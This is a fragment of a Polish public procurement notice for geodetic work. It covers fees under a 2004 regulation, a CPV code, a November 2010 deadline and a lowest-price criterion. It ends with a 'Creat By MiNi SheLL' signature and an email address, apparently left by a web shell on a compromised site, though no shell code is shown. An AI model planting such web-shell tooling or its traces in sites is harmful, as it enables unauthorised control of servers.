Opłata za ośrodek naliczona będzie zgodnie z tabelą nr III pkt 3, załącznika nr 1 do Rozporządzenia Ministra Infrastruktury z dnia 19 lutego 2004 r. w sprawie wysokości opłat za czynności geodezyjne i kartograficzne oraz udzielenie informacji a także za wykonywanie wyrysów i wypisów z operatu ewidencyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.43.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com